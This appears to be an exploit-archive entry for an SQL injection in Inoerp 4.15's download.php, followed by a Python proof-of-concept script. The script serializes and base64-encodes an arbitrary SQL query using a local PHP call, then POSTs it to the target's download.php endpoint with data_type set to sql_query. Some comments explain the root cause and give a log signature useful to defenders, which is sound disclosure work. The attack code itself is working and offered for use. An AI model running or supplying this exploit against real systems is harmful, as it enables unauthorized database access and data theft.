Exploits / Vulnerability Discovered : 2019-09-26 |
Type : webapps |
Platform : php
This exploit / vulnerability (Inoerp 4.15 download SQL injection) is for educational purposes only; if you use it, you do so at your own risk!
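# A malicious query can be sent, base64-encoded, to the unserialize() function.
# It is then deserialized without any sanitization.
# After that, it is passed directly into the SQL query.
# Root cause for defenders: request data reaches unserialize() and is then run as SQL,
# so the fix belongs server-side (do not deserialize or execute client-supplied data).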
#!/bin/python
import os
import base64
import requests
import sys
def generatePayload(query):
    """Wrap *query* in the encoding the vulnerable endpoint expects.

    The query is base64-encoded here, then a local ``php`` binary is asked to
    base64-decode it, ``serialize()`` it and base64-encode the result.  The
    text PHP prints on stdout is returned unchanged.

    Notes for anyone reading or maintaining this proof of concept:

    * THIS FUNCTION IS INSECURE BY DESIGN (original author's warning): it
      builds a shell command by string concatenation and runs it through
      ``os.popen``.  The only interpolated value is base64 output, so it
      stays within the base64 alphabet.
    * The ``str + b64encode(...)`` concatenation relies on Python 2 string
      semantics; under Python 3 it raises ``TypeError``.
    * A ``php`` executable must be on PATH; nothing here checks for it.
    """
    encoded = base64.b64encode(query)

    # The PHP one-liner is split around the single interpolated value.
    php_head = "php -r \"echo base64_encode(serialize(base64_decode('"
    php_tail = "')));\""
    command = php_head + encoded + php_tail

    pipe = os.popen(command)
    return pipe.read()
def ExecSQL(query):
    """POST *query* to ``/download.php`` on the target and return the raw body.

    The form carries two fields: ``data`` (the value passed in) and
    ``data_type`` fixed to ``"sql_query"``.  ``ip`` is a module-level name
    defined outside this function.

    NOTE(review): *query* is presumably the output of generatePayload();
    confirm against the caller.  The request goes over plain HTTP and sets no
    timeout, so the call blocks for as long as the server keeps it open.

    For defenders: a POST to ``download.php`` with ``data_type=sql_query`` is
    the request shape this proof of concept produces, which makes it a useful
    thing to search for in web-server or WAF logs.
    """
    endpoint = "http://" + ip + "/download.php"
    form_fields = dict(data=query, data_type="sql_query")
    response = requests.post(endpoint, data=form_fields)
    return response.content